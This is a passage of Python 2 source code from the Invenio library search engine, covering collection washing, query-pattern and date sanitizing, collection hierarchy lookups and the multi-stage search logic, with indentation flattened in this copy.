"Checks if the two are equal, and if yes, returns ' selected'. Useful for select boxes."
if type(var) is int and type(fld) is int:
if var == fld:
return " selected"
elif str(var) == str(fld):
return " selected"
elif fld and len(fld)==3 and fld[0] == "w" and var == fld[1:]:
return " selected"
return ""
def wash_colls(cc, c, split_colls=0, verbose=0):
"""Wash collection list by checking whether user has deselected
anything under 'Narrow search'. Checks also if cc is a list or not.
Return list of cc, colls_to_display, colls_to_search since the list
of collections to display is different from that to search in.
This is because users might have chosen 'split by collection'
functionality.
The behaviour of "collections to display" depends solely whether
user has deselected a particular collection: e.g. if it started
from 'Articles and Preprints' page, and deselected 'Preprints',
then collection to display is 'Articles'. If he did not deselect
anything, then collection to display is 'Articles & Preprints'.
The behaviour of "collections to search in" depends on the
'split_colls' parameter:
* if is equal to 1, then we can wash the colls list down
and search solely in the collection the user started from;
* if is equal to 0, then we are splitting to the first level
of collections, i.e. collections as they appear on the page
we started to search from;
The function raises exception
InvenioWebSearchUnknownCollectionError
if cc or one of c collections is not known.
"""
colls_out = []
colls_out_for_display = []
# list to hold the hosted collections to be searched and displayed
hosted_colls_out = []
debug = ""
if verbose:
debug += "<br />"
debug += "<br />1) --- initial parameters ---"
debug += "<br />cc : %s" % cc
debug += "<br />c : %s" % c
debug += "<br />"
# check what type is 'cc':
if type(cc) is list:
for ci in cc:
if collection_reclist_cache.cache.has_key(ci):
# yes this collection is real, so use it:
cc = ci
break
else:
# check once if cc is real:
if not collection_reclist_cache.cache.has_key(cc):
if cc:
raise InvenioWebSearchUnknownCollectionError(cc)
else:
cc = CFG_SITE_NAME # cc is not set, so replace it with Home collection
# check type of 'c' argument:
if type(c) is list:
colls = c
else:
colls = [c]
if verbose:
debug += "<br />2) --- after check for the integrity of cc and the being or not c a list ---"
debug += "<br />cc : %s" % cc
debug += "<br />c : %s" % c
debug += "<br />"
# remove all 'unreal' collections:
colls_real = []
for coll in colls:
if collection_reclist_cache.cache.has_key(coll):
colls_real.append(coll)
else:
if coll:
raise InvenioWebSearchUnknownCollectionError(coll)
colls = colls_real
if verbose:
debug += "<br />3) --- keeping only the real colls of c ---"
debug += "<br />colls : %s" % colls
debug += "<br />"
# check if some real collections remain:
if len(colls)==0:
colls = [cc]
if verbose:
debug += "<br />4) --- in case no colls were left we use cc directly ---"
debug += "<br />colls : %s" % colls
debug += "<br />"
# then let us check the list of non-restricted "real" sons of 'cc' and compare it to 'coll':
res = run_sql("""SELECT c.name FROM collection AS c,
collection_collection AS cc,
collection AS ccc
WHERE c.id=cc.id_son AND cc.id_dad=ccc.id
AND ccc.name=%s AND cc.type='r'""", (cc,))
# list that holds all the non restricted sons of cc that are also not hosted collections
l_cc_nonrestricted_sons_and_nonhosted_colls = []
res_hosted = run_sql("""SELECT c.name FROM collection AS c,
collection_collection AS cc,
collection AS ccc
WHERE c.id=cc.id_son AND cc.id_dad=ccc.id
AND ccc.name=%s AND cc.type='r'
AND (c.dbquery NOT LIKE 'hostedcollection:%%' OR c.dbquery IS NULL)""", (cc,))
for row_hosted in res_hosted:
l_cc_nonrestricted_sons_and_nonhosted_colls.append(row_hosted[0])
l_cc_nonrestricted_sons_and_nonhosted_colls.sort()
l_cc_nonrestricted_sons = []
l_c = colls[:]
for row in res:
if not collection_restricted_p(row[0]):
l_cc_nonrestricted_sons.append(row[0])
l_c.sort()
l_cc_nonrestricted_sons.sort()
if l_cc_nonrestricted_sons == l_c:
colls_out_for_display = [cc] # yep, washing permitted, it is sufficient to display 'cc'
# the following elif is a hack that preserves the above funcionality when we start searching from
# the frontpage with some hosted collections deselected (either by default or manually)
elif set(l_cc_nonrestricted_sons_and_nonhosted_colls).issubset(set(l_c)):
colls_out_for_display = colls
split_colls = 0
else:
colls_out_for_display = colls # nope, we need to display all 'colls' successively
# remove duplicates:
#colls_out_for_display_nondups=filter(lambda x, colls_out_for_display=colls_out_for_display: colls_out_for_display[x-1] not in colls_out_for_display[x:], range(1, len(colls_out_for_display)+1))
#colls_out_for_display = map(lambda x, colls_out_for_display=colls_out_for_display:colls_out_for_display[x-1], colls_out_for_display_nondups)
#colls_out_for_display = list(set(colls_out_for_display))
#remove duplicates while preserving the order
set_out = set()
colls_out_for_display = [coll for coll in colls_out_for_display if coll not in set_out and not set_out.add(coll)]
if verbose:
debug += "<br />5) --- decide whether colls_out_for_diplay should be colls or is it sufficient for it to be cc; remove duplicates ---"
debug += "<br />colls_out_for_display : %s" % colls_out_for_display
debug += "<br />"
# FIXME: The below quoted part of the code has been commented out
# because it prevents searching in individual restricted daughter
# collections when both parent and all its public daughter
# collections were asked for, in addition to some restricted
# daughter collections. The removal was introduced for hosted
# collections, so we may want to double check in this context.
# the following piece of code takes care of removing collections whose ancestors are going to be searched anyway
# list to hold the collections to be removed
#colls_to_be_removed = []
# first calculate the collections that can safely be removed
#for coll in colls_out_for_display:
# for ancestor in get_coll_ancestors(coll):
# #if ancestor in colls_out_for_display: colls_to_be_removed.append(coll)
# if ancestor in colls_out_for_display and not is_hosted_collection(coll): colls_to_be_removed.append(coll)
# secondly remove the collections
#for coll in colls_to_be_removed:
# colls_out_for_display.remove(coll)
if verbose:
debug += "<br />6) --- remove collections that have ancestors about to be search, unless they are hosted ---"
debug += "<br />colls_out_for_display : %s" % colls_out_for_display
debug += "<br />"
# calculate the hosted collections to be searched.
if colls_out_for_display == [cc]:
if is_hosted_collection(cc):
hosted_colls_out.append(cc)
else:
for coll in get_coll_sons(cc):
if is_hosted_collection(coll):
hosted_colls_out.append(coll)
else:
for coll in colls_out_for_display:
if is_hosted_collection(coll):
hosted_colls_out.append(coll)
if verbose:
debug += "<br />7) --- calculate the hosted_colls_out ---"
debug += "<br />hosted_colls_out : %s" % hosted_colls_out
debug += "<br />"
# second, let us decide on collection splitting:
if split_colls == 0:
# type A - no sons are wanted
colls_out = colls_out_for_display
else:
# type B - sons (first-level descendants) are wanted
for coll in colls_out_for_display:
coll_sons = get_coll_sons(coll)
if coll_sons == []:
colls_out.append(coll)
else:
for coll_son in coll_sons:
if not is_hosted_collection(coll_son):
colls_out.append(coll_son)
#else:
# colls_out = colls_out + coll_sons
# remove duplicates:
#colls_out_nondups=filter(lambda x, colls_out=colls_out: colls_out[x-1] not in colls_out[x:], range(1, len(colls_out)+1))
#colls_out = map(lambda x, colls_out=colls_out:colls_out[x-1], colls_out_nondups)
#colls_out = list(set(colls_out))
#remove duplicates while preserving the order
set_out = set()
colls_out = [coll for coll in colls_out if coll not in set_out and not set_out.add(coll)]
if verbose:
debug += "<br />8) --- calculate the colls_out; remove duplicates ---"
debug += "<br />colls_out : %s" % colls_out
debug += "<br />"
# remove the hosted collections from the collections to be searched
if hosted_colls_out:
for coll in hosted_colls_out:
try:
colls_out.remove(coll)
except ValueError:
# in case coll was not found in colls_out
pass
if verbose:
debug += "<br />9) --- remove the hosted_colls from the colls_out ---"
debug += "<br />colls_out : %s" % colls_out
return (cc, colls_out_for_display, colls_out, hosted_colls_out, debug)
def get_synonym_terms(term, kbr_name, match_type, use_memoise=False):
"""
Return list of synonyms for TERM by looking in KBR_NAME in
MATCH_TYPE style.
@param term: search-time term or index-time term
@type term: str
@param kbr_name: knowledge base name
@type kbr_name: str
@param match_type: specifies how the term matches against the KBR
before doing the lookup. Could be `exact' (default),
'leading_to_comma', `leading_to_number'.
@type match_type: str
@param use_memoise: can we memoise while doing lookups?
@type use_memoise: bool
@return: list of term synonyms
@rtype: list of strings
"""
dterms = {}
## exact match is default:
term_for_lookup = term
term_remainder = ''
## but maybe match different term:
if match_type == CFG_BIBINDEX_SYNONYM_MATCH_TYPE['leading_to_comma']:
mmm = re.match(r'^(.*?)(\s*,.*)$', term)
if mmm:
term_for_lookup = mmm.group(1)
term_remainder = mmm.group(2)
elif match_type == CFG_BIBINDEX_SYNONYM_MATCH_TYPE['leading_to_number']:
mmm = re.match(r'^(.*?)(\s*\d.*)$', term)
if mmm:
term_for_lookup = mmm.group(1)
term_remainder = mmm.group(2)
## FIXME: workaround: escaping SQL wild-card signs, since KBR's
## exact search is doing LIKE query, so would match everything:
term_for_lookup = term_for_lookup.replace('%', '\%')
## OK, now find synonyms:
for kbr_values in get_kbr_values(kbr_name,
searchkey=term_for_lookup,
searchtype='e',
use_memoise=use_memoise):
for kbr_value in kbr_values:
dterms[kbr_value + term_remainder] = 1
## return list of term synonyms:
return dterms.keys()
def wash_output_format(format):
"""Wash output format FORMAT. Currently only prevents input like
'of=9' for backwards-compatible format that prints certain fields
only. (for this task, 'of=tm' is preferred)"""
if str(format[0:3]).isdigit() and len(format) != 6:
# asked to print MARC tags, but not enough digits,
# so let's switch back to HTML brief default
return 'hb'
else:
return format
def wash_pattern(p):
"""Wash pattern passed by URL. Check for sanity of the wildcard by
removing wildcards if they are appended to extremely short words
(1-3 letters). TODO: instead of this approximative treatment, it
will be much better to introduce a temporal limit, e.g. to kill a
query if it does not finish in 10 seconds."""
# strip accents:
# p = strip_accents(p) # FIXME: when available, strip accents all the time
# add leading/trailing whitespace for the two following wildcard-sanity checking regexps:
p = " " + p + " "
# replace spaces within quotes by __SPACE__ temporarily:
p = re_pattern_single_quotes.sub(lambda x: "'"+string.replace(x.group(1), ' ', '__SPACE__')+"'", p)
p = re_pattern_double_quotes.sub(lambda x: "\""+string.replace(x.group(1), ' ', '__SPACE__')+"\"", p)
p = re_pattern_regexp_quotes.sub(lambda x: "/"+string.replace(x.group(1), ' ', '__SPACE__')+"/", p)
# get rid of unquoted wildcards after spaces:
p = re_pattern_wildcards_after_spaces.sub("\\1", p)
# get rid of extremely short words (1-3 letters with wildcards):
#p = re_pattern_short_words.sub("\\1", p)
# replace back __SPACE__ by spaces:
p = re_pattern_space.sub(" ", p)
# replace special terms:
p = re_pattern_today.sub(time.strftime("%Y-%m-%d", time.localtime()), p)
# remove unnecessary whitespace:
p = string.strip(p)
# remove potentially wrong UTF-8 characters:
p = wash_for_utf8(p)
return p
def wash_field(f):
"""Wash field passed by URL."""
if f:
# get rid of unnecessary whitespace and make it lowercase
# (e.g. Author -> author) to better suit iPhone etc input
# mode:
f = f.strip().lower()
# wash legacy 'f' field names, e.g. replace 'wau' or `au' by
# 'author', if applicable:
if CFG_WEBSEARCH_FIELDS_CONVERT:
f = CFG_WEBSEARCH_FIELDS_CONVERT.get(f, f)
return f
def wash_dates(d1="", d1y=0, d1m=0, d1d=0, d2="", d2y=0, d2m=0, d2d=0):
"""
Take user-submitted date arguments D1 (full datetime string) or
(D1Y, D1M, D1Y) year, month, day tuple and D2 or (D2Y, D2M, D2Y)
and return (YYY1-M1-D2 H1:M1:S2, YYY2-M2-D2 H2:M2:S2) datetime
strings in the YYYY-MM-DD HH:MM:SS format suitable for time
restricted searching.
Note that when both D1 and (D1Y, D1M, D1D) parameters are present,
the precedence goes to D1. Ditto for D2*.
Note that when (D1Y, D1M, D1D) are taken into account, some values
may be missing and are completed e.g. to 01 or 12 according to
whether it is the starting or the ending date.
"""
datetext1, datetext2 = "", ""
# sanity checking:
if d1 == "" and d1y == 0 and d1m == 0 and d1d == 0 and d2 == "" and d2y == 0 and d2m == 0 and d2d == 0:
return ("", "") # nothing selected, so return empty values
# wash first (starting) date:
if d1:
# full datetime string takes precedence:
datetext1 = d1
else:
# okay, first date passed as (year,month,day):
if d1y:
datetext1 += "%04d" % d1y
else:
datetext1 += "0000"
if d1m:
datetext1 += "-%02d" % d1m
else:
datetext1 += "-01"
if d1d:
datetext1 += "-%02d" % d1d
else:
datetext1 += "-01"
datetext1 += " 00:00:00"
# wash second (ending) date:
if d2:
# full datetime string takes precedence:
datetext2 = d2
else:
# okay, second date passed as (year,month,day):
if d2y:
datetext2 += "%04d" % d2y
else:
datetext2 += "9999"
if d2m:
datetext2 += "-%02d" % d2m
else:
datetext2 += "-12"
if d2d:
datetext2 += "-%02d" % d2d
else:
datetext2 += "-31" # NOTE: perhaps we should add max(datenumber) in
# given month, but for our quering it's not
# needed, 31 will always do
datetext2 += " 00:00:00"
# okay, return constructed YYYY-MM-DD HH:MM:SS datetexts:
return (datetext1, datetext2)
def is_hosted_collection(coll):
"""Check if the given collection is a hosted one; i.e. its dbquery starts with hostedcollection:
Returns True if it is, False if it's not or if the result is empty or if the query failed"""
res = run_sql("SELECT dbquery FROM collection WHERE name=%s", (coll, ))
try:
return res[0][0].startswith("hostedcollection:")
except:
return False
def get_colID(c):
"Return collection ID for collection name C. Return None if no match found."
colID = None
res = run_sql("SELECT id FROM collection WHERE name=%s", (c,), 1)
if res:
colID = res[0][0]
return colID
def get_coll_normalised_name(c):
"""Returns normalised collection name (case sensitive) for collection name
C (case insensitive).
Returns None if no match found."""
try:
return run_sql("SELECT name FROM collection WHERE name=%s", (c,))[0][0]
except:
return None
def get_coll_ancestors(coll):
"Returns a list of ancestors for collection 'coll'."
coll_ancestors = []
coll_ancestor = coll
while 1:
res = run_sql("""SELECT c.name FROM collection AS c
LEFT JOIN collection_collection AS cc ON c.id=cc.id_dad
LEFT JOIN collection AS ccc ON ccc.id=cc.id_son
WHERE ccc.name=%s ORDER BY cc.id_dad ASC LIMIT 1""",
(coll_ancestor,))
if res:
coll_name = res[0][0]
coll_ancestors.append(coll_name)
coll_ancestor = coll_name
else:
break
# ancestors found, return reversed list:
coll_ancestors.reverse()
return coll_ancestors
def get_coll_sons(coll, type='r', public_only=1):
"""Return a list of sons (first-level descendants) of type 'type' for collection 'coll'.
If public_only, then return only non-restricted son collections.
"""
coll_sons = []
query = "SELECT c.name FROM collection AS c "\
"LEFT JOIN collection_collection AS cc ON c.id=cc.id_son "\
"LEFT JOIN collection AS ccc ON ccc.id=cc.id_dad "\
"WHERE cc.type=%s AND ccc.name=%s"
query += " ORDER BY cc.score DESC"
res = run_sql(query, (type, coll))
for name in res:
if not public_only or not collection_restricted_p(name[0]):
coll_sons.append(name[0])
return coll_sons
class CollectionAllChildrenDataCacher(DataCacher):
"""Cache for all children of a collection (regular & virtual, public & private)"""
def __init__(self):
def cache_filler():
def get_all_children(coll, type='r', public_only=1):
"""Return a list of all children of type 'type' for collection 'coll'.
If public_only, then return only non-restricted child collections.
If type='*', then return both regular and virtual collections.
"""
children = []
if type == '*':
sons = get_coll_sons(coll, 'r', public_only) + get_coll_sons(coll, 'v', public_only)
else:
sons = get_coll_sons(coll, type, public_only)
for child in sons:
children.append(child)
children.extend(get_all_children(child, type, public_only))
return children
ret = {}
collections = collection_reclist_cache.cache.keys()
for collection in collections:
ret[collection] = get_all_children(collection, '*', public_only=0)
return ret
def timestamp_verifier():
return max(get_table_update_time('collection'), get_table_update_time('collection_collection'))
DataCacher.__init__(self, cache_filler, timestamp_verifier)
try:
if not collection_allchildren_cache.is_ok_p:
raise Exception
except Exception:
collection_allchildren_cache = CollectionAllChildrenDataCacher()
def get_collection_allchildren(coll, recreate_cache_if_needed=True):
"""Returns the list of all children of a collection."""
if recreate_cache_if_needed:
collection_allchildren_cache.recreate_cache_if_needed()
if coll not in collection_allchildren_cache.cache:
return [] # collection does not exist; return empty list
return collection_allchildren_cache.cache[coll]
def get_coll_real_descendants(coll, type='_', get_hosted_colls=True):
"""Return a list of all descendants of collection 'coll' that are defined by a 'dbquery'.
IOW, we need to decompose compound collections like "A & B" into "A" and "B" provided
that "A & B" has no associated database query defined.
"""
coll_sons = []
res = run_sql("""SELECT c.name,c.dbquery FROM collection AS c
LEFT JOIN collection_collection AS cc ON c.id=cc.id_son
LEFT JOIN collection AS ccc ON ccc.id=cc.id_dad
WHERE ccc.name=%s AND cc.type LIKE %s ORDER BY cc.score DESC""",
(coll, type,))
for name, dbquery in res:
if dbquery: # this is 'real' collection, so return it:
if get_hosted_colls:
coll_sons.append(name)
else:
if not dbquery.startswith("hostedcollection:"):
coll_sons.append(name)
else: # this is 'composed' collection, so recurse:
coll_sons.extend(get_coll_real_descendants(name))
return coll_sons
def browse_pattern_phrases(req, colls, p, f, rg, ln=CFG_SITE_LANG):
"""Returns either biliographic phrases or words indexes."""
## is p enclosed in quotes? (coming from exact search)
if p.startswith('"') and p.endswith('"'):
p = p[1:-1]
p_orig = p
## okay, "real browse" follows:
## FIXME: the maths in the get_nearest_terms_in_bibxxx is just a test
if not f and string.find(p, ":") > 0: # does 'p' contain ':'?
f, p = string.split(p, ":", 1)
## do we search in words indexes?
# FIXME uncomment this
#if not f:
# return browse_in_bibwords(req, p, f)
coll_hitset = intbitset()
for coll_name in colls:
coll_hitset |= get_collection_reclist(coll_name)
index_id = get_index_id_from_field(f)
if index_id != 0:
browsed_phrases_in_colls = get_nearest_terms_in_idxphrase_with_collection(p, index_id, rg/2, rg/2, coll_hitset)
else:
browsed_phrases = get_nearest_terms_in_bibxxx(p, f, (rg+1)/2+1, (rg-1)/2+1)
while not browsed_phrases:
# try again and again with shorter and shorter pattern:
try:
p = p[:-1]
browsed_phrases = get_nearest_terms_in_bibxxx(p, f, (rg+1)/2+1, (rg-1)/2+1)
except:
# probably there are no hits at all:
#req.write(_("No values found."))
return []
## try to check hits in these particular collection selection:
browsed_phrases_in_colls = []
if 0:
for phrase in browsed_phrases:
phrase_hitset = intbitset()
phrase_hitsets = search_pattern("", phrase, f, 'e')
for coll in colls:
phrase_hitset.union_update(phrase_hitsets[coll])
if len(phrase_hitset) > 0:
# okay, this phrase has some hits in colls, so add it:
browsed_phrases_in_colls.append([phrase, len(phrase_hitset)])
## were there hits in collections?
if browsed_phrases_in_colls == []:
if browsed_phrases != []:
#write_warning(req, """<p>No match close to <em>%s</em> found in given collections.
#Please try different term.<p>Displaying matches in any collection...""" % p_orig)
## try to get nbhits for these phrases in any collection:
for phrase in browsed_phrases:
nbhits = get_nbhits_in_bibxxx(phrase, f, coll_hitset)
if nbhits > 0:
browsed_phrases_in_colls.append([phrase, nbhits])
return browsed_phrases_in_colls
def browse_pattern(req, colls, p, f, rg, ln=CFG_SITE_LANG):
"""Displays either biliographic phrases or words indexes."""
# load the right message language
_ = gettext_set_language(ln)
browsed_phrases_in_colls = browse_pattern_phrases(req, colls, p, f, rg, ln)
if len(browsed_phrases_in_colls) == 0:
req.write(_("No values found."))
return
## display results now:
out = websearch_templates.tmpl_browse_pattern(
f=f,
fn=get_field_i18nname(get_field_name(f) or f, ln, False),
ln=ln,
browsed_phrases_in_colls=browsed_phrases_in_colls,
colls=colls,
rg=rg,
)
req.write(out)
return
def browse_in_bibwords(req, p, f, ln=CFG_SITE_LANG):
"""Browse inside words indexes."""
if not p:
return
_ = gettext_set_language(ln)
urlargd = {}
urlargd.update(req.argd)
urlargd['action'] = 'search'
nearest_box = create_nearest_terms_box(urlargd, p, f, 'w', ln=ln, intro_text_p=0)
req.write(websearch_templates.tmpl_search_in_bibwords(
p = p,
f = f,
ln = ln,
nearest_box = nearest_box
))
return
def search_pattern(req=None, p=None, f=None, m=None, ap=0, of="id", verbose=0, ln=CFG_SITE_LANG, display_nearest_terms_box=True, wl=0):
"""Search for complex pattern 'p' within field 'f' according to
matching type 'm'. Return hitset of recIDs.
The function uses multi-stage searching algorithm in case of no
exact match found. See the Search Internals document for
detailed description.
The 'ap' argument governs whether an alternative patterns are to
be used in case there is no direct hit for (p,f,m). For
example, whether to replace non-alphanumeric characters by
spaces if it would give some hits. See the Search Internals
document for detailed description. (ap=0 forbits the
alternative pattern usage, ap=1 permits it.)
'ap' is also internally used for allowing hidden tag search
(for requests coming from webcoll, for example). In this
case ap=-9
The 'of' argument governs whether to print or not some
information to the user in case of no match found. (Usually it
prints the information in case of HTML formats, otherwise it's
silent).
The 'verbose' argument controls the level of debugging information
to be printed (0=least, 9=most).
All the parameters are assumed to have been previously washed.
This function is suitable as a mid-level API.
"""
_ = gettext_set_language(ln)
hitset_empty = intbitset()
# sanity check:
if not p:
hitset_full = intbitset(trailing_bits=1)
hitset_full.discard(0)
# no pattern, so return all universe
return hitset_full
# search stage 1: break up arguments into basic search units:
if verbose and of.startswith("h"):
t1 = os.times()[4]
basic_search_units = create_basic_search_units(req, p, f, m, of)
if verbose and of.startswith("h"):
t2 = os.times()[4]
write_warning("Search stage 1: basic search units are: %s" % cgi.escape(repr(basic_search_units)), req=req)
write_warning("Search stage 1: execution took %.2f seconds." % (t2 - t1), req=req)
# search stage 2: do search for each search unit and verify hit presence:
if verbose and of.startswith("h"):
t1 = os.times()[4]
basic_search_units_hitsets = []
#prepare hiddenfield-related..
myhiddens = CFG_BIBFORMAT_HIDDEN_TAGS
can_see_hidden = False
if req:
user_info = collect_user_info(req)
can_see_hidden = user_info.get('precached_canseehiddenmarctags', False)
if not req and ap == -9: # special request, coming from webcoll
can_see_hidden = True
if can_see_hidden:
myhiddens = []
if CFG_INSPIRE_SITE and of.startswith('h'):
# fulltext/caption search warnings for INSPIRE:
fields_to_be_searched = [f for o, p, f, m in basic_search_units]
if 'fulltext' in fields_to_be_searched:
write_warning( _("Warning: full-text search is only available for a subset of papers mostly from %(x_range_from_year)s-%(x_range_to_year)s.") % \
{'x_range_from_year': '2006',
'x_range_to_year': '2012'}, req=req)
elif 'caption' in fields_to_be_searched:
write_warning(_("Warning: figure caption search is only available for a subset of papers mostly from %(x_range_from_year)s-%(x_range_to_year)s.") % \
{'x_range_from_year': '2008',
'x_range_to_year': '2012'}, req=req)
for idx_unit in xrange(len(basic_search_units)):
bsu_o, bsu_p, bsu_f, bsu_m = basic_search_units[idx_unit]
if bsu_f and len(bsu_f) < 2:
if of.startswith("h"):
write_warning(_("There is no index %s. Searching for %s in all fields." % (bsu_f, bsu_p)), req=req)
bsu_f = ''
bsu_m = 'w'
if of.startswith("h") and verbose:
write_warning(_('Instead searching %s.' % str([bsu_o, bsu_p, bsu_f, bsu_m])), req=req)
try:
basic_search_unit_hitset = search_unit(bsu_p, bsu_f, bsu_m, wl)
except InvenioWebSearchWildcardLimitError, excp:
basic_search_unit_hitset = excp.res
if of.startswith("h"):
write_warning(_("Search term too generic, displaying only partial results..."), req=req)
# FIXME: print warning if we use native full-text indexing
if bsu_f == 'fulltext' and bsu_m != 'w' and of.startswith('h') and not CFG_SOLR_URL:
write_warning(_("No phrase index available for fulltext yet, looking for word combination..."), req=req)
#check that the user is allowed to search with this tag
#if he/she tries it
if bsu_f and len(bsu_f) > 1 and bsu_f[0].isdigit() and bsu_f[1].isdigit():
for htag in myhiddens:
ltag = len(htag)
samelenfield = bsu_f[0:ltag]
if samelenfield == htag: #user searches by a hidden tag
#we won't show you anything..
basic_search_unit_hitset = intbitset()
if verbose >= 9 and of.startswith("h"):
write_warning("Pattern %s hitlist omitted since \
it queries in a hidden tag %s" %
(cgi.escape(repr(bsu_p)), repr(myhiddens)), req=req)
display_nearest_terms_box = False #..and stop spying, too.
if verbose >= 9 and of.startswith("h"):
write_warning("Search stage 1: pattern %s gave hitlist %s" % (cgi.escape(bsu_p), basic_search_unit_hitset), req=req)
if len(basic_search_unit_hitset) > 0 or \
ap<1 or \
bsu_o=="|" or \
((idx_unit+1)<len(basic_search_units) and basic_search_units[idx_unit+1][0]=="|"):
# stage 2-1: this basic search unit is retained, since
# either the hitset is non-empty, or the approximate
# pattern treatment is switched off, or the search unit
# was joined by an OR operator to preceding/following
# units so we do not require that it exists
basic_search_units_hitsets.append(basic_search_unit_hitset)
else:
# stage 2-2: no hits found for this search unit, try to replace non-alphanumeric chars inside pattern:
if re.search(r'[^a-zA-Z0-9\s\:]', bsu_p) and bsu_f != 'refersto' and bsu_f != 'citedby':
if bsu_p.startswith('"') and bsu_p.endswith('"'): # is it ACC query?
bsu_pn = re.sub(r'[^a-zA-Z0-9\s\:]+', "*", bsu_p)
else: # it is WRD query
bsu_pn = re.sub(r'[^a-zA-Z0-9\s\:]+', " ", bsu_p)
if verbose and of.startswith('h') and req:
write_warning("Trying (%s,%s,%s)" % (cgi.escape(bsu_pn), cgi.escape(bsu_f), cgi.escape(bsu_m)), req=req)
basic_search_unit_hitset = search_pattern(req=None, p=bsu_pn, f=bsu_f, m=bsu_m, of="id", ln=ln, wl=wl)
if len(basic_search_unit_hitset) > 0:
# we retain the new unit instead
if of.startswith('h'):
write_warning(_("No exact match found for %(x_query1)s, using %(x_query2)s instead...") % \
{'x_query1': "<em>" + cgi.escape(bsu_p) + "</em>",
'x_query2': "<em>" + cgi.escape(bsu_pn) + "</em>"}, req=req)
basic_search_units[idx_unit][1] = bsu_pn
basic_search_units_hitsets.append(basic_search_unit_hitset)
else:
# stage 2-3: no hits found either, propose nearest indexed terms:
if of.startswith('h') and display_nearest_terms_box:
if req:
if bsu_f == "recid":
write_warning(_("Requested record does not seem to exist."), req=req)
else:
write_warning(create_nearest_terms_box(req.argd, bsu_p, bsu_f, bsu_m, ln=ln), req=req)
return hitset_empty
else:
# stage 2-3: no hits found either, propose nearest indexed terms:
if of.startswith('h') and display_nearest_terms_box:
if req:
if bsu_f == "recid":
write_warning(_("Requested record does not seem to exist."), req=req)
else:
write_warning(create_nearest_terms_box(req.argd, bsu_p, bsu_f, bsu_m, ln=ln), req=req)
return hitset_empty
if verbose and of.startswith("h"):
t2 = os.times()[4]
for idx_unit in range(0, len(basic_search_units)):
write_warning("Search stage 2: basic search unit %s gave %d hits." %
(basic_search_units[idx_unit][1:], len(basic_search_units_hitsets[idx_unit])), req=req)
write_warning("Search stage 2: execution took %.2f seconds." % (t2 - t1), req=req)
# search stage 3: apply boolean query for each search unit:
if verbose and of.startswith("h"):
t1 = os.times()[4]
# let the initial set be the complete universe:
hitset_in_any_collection = intbitset(trailing_bits=1)
hitset_in_any_collection.discard(0)
for idx_unit in xrange(len(basic_search_units)):
this_unit_operation = basic_search_units[idx_unit][0]
this_unit_hitset = basic_search_units_hitsets[idx_unit]
if this_unit_operation == '+':
hitset_in_any_collection.intersection_update(this_unit_hitset)
elif this_unit_operation == '-':
hitset_in_any_collection.difference_update(this_unit_hitset)
elif this_unit_operation == '|':
hitset_in_any_collection.union_update(this_unit_hitset)
else:
if of.startswith("h"):
write_warning("Invalid set operation %s." % cgi.escape(this_unit_operation), "Error", req=req)
if len(hitset_in_any_collection) == 0:
# no hits found, propose alternative boolean query:
if of.startswith('h') and display_nearest_terms_box:
nearestterms = []
for idx_unit in range(0, len(basic_search_units)):
bsu_o, bsu_p, bsu_f, bsu_m = basic_search_units[idx_unit]
if bsu_p.startswith("%") and bsu_p.endswith("%"):
bsu_p = "'" + bsu_p[1:-1] + "'"
bsu_nbhits = len(basic_search_units_hitsets[idx_unit])
# create a similar query, but with the basic search unit only
argd = {}
argd.update(req.argd)
argd['p'] = bsu_p
argd['f'] = bsu_f
nearestterms.append((bsu_p, bsu_nbhits, argd))
text = websearch_templates.tmpl_search_no_boolean_hits(
ln=ln, nearestterms=nearestterms)
write_warning(text, req=req)
if verbose and of.startswith("h"):
t2 = os.times()[4]
write_warning("Search stage 3: boolean query gave %d hits." % len(hitset_in_any_collection), req=req)
write_warning("Search stage 3: execution took %.2f seconds." % (t2 - t1), req=req)
return hitset_in_any_collection
def search_pattern_parenthesised(req=None, p=None, f=None, m=None, ap=0, of="id", verbose=0, ln=CFG_SITE_LANG, display_nearest_terms_box=True, wl=0):
"""Search for complex pattern 'p' containing parenthesis within field 'f' according to
matching type 'm'. Return hitset of recIDs.
For more details on the parameters see 'search_pattern'
"""
_ = gettext_set_language(ln)
spires_syntax_converter = SpiresToInvenioSyntaxConverter()
spires_syntax_query = False
# if the pattern uses SPIRES search syntax, convert it to Invenio syntax
if spires_syntax_converter.is_applicable(p):
spires_syntax_query = True
p = spires_syntax_converter.convert_query(p)
# sanity check: do not call parenthesised parser for search terms
# like U(1) but still call it for searches like ('U(1)' | 'U(2)'):
if not re_pattern_parens.search(re_pattern_parens_quotes.sub('_', p)):
return search_pattern(req, p, f, m, ap, of, verbose, ln, display_nearest_terms_box=display_nearest_terms_box, wl=wl)
# Try searching with parentheses
try:
parser = SearchQueryParenthesisedParser()
# get a hitset with all recids
result_hitset = intbitset(trailing_bits=1)
# parse the query. The result is list of [op1, expr1, op2, expr2, ..., opN, exprN]
parsing_result = parser.parse_query(p)
if verbose and of.startswith("h"):
write_warning("Search stage 1: search_pattern_parenthesised() searched %s." % repr(p), req=req)
write_warning("Search stage 1: search_pattern_parenthesised() returned %s." % repr(parsing_result), req=req)
# go through every pattern
# calculate hitset for it
# combine pattern's hitset with the result using the corresponding operator
for index in xrange(0, len(parsing_result)-1, 2 ):
current_operator = parsing_result[index]
current_pattern = parsing_result[index+1]
if CFG_INSPIRE_SITE and spires_syntax_query:
# setting ap=0 to turn off approximate matching for 0 results.
# Doesn't work well in combinations.
# FIXME: The right fix involves collecting statuses for each
# hitset, then showing a nearest terms box exactly once,
# outside this loop.
ap = 0
display_nearest_terms_box = False
# obtain a hitset for the current pattern
current_hitset = search_pattern(req, current_pattern, f, m, ap, of, verbose, ln, display_nearest_terms_box=display_nearest_terms_box, wl=wl)
# combine the current hitset with resulting hitset using the current operator
if current_operator == '+':
result_hitset = result_hitset & current_hitset
elif current_operator == '-':
result_hitset = result_hitset - current_hitset
elif current_operator == '|':
result_hitset = result_hitset | current_hitset
else:
assert False, "Unknown operator in search_pattern_parenthesised()"
return result_hitset
# If searching with parenteses fails, perform search ignoring parentheses
except SyntaxError:
write_warning(_("Search syntax misunderstood. Ignoring all parentheses in the query. If this doesn't help, please check your search and try again."), req=req)
# remove the parentheses in the query. Current implementation removes all the parentheses,
# but it could be improved to romove only these that are not inside quotes
p = p.replace('(', ' ')
p = p.replace(')', ' ')
return search_pattern(req, p, f, m, ap, of, verbose, ln, display_nearest_terms_box=display_nearest_terms_box, wl=wl)
def search_unit(p, f=None, m=None, wl=0, ignore_synonyms=None):
"""Search for basic search unit defined by pattern 'p' and field
'f' and matching type 'm'. Return hitset of recIDs.
All the parameters are assumed to have been previously washed.
'p' is assumed to be already a ``basic search unit'' so that it
is searched as such and is not broken up in any way. Only
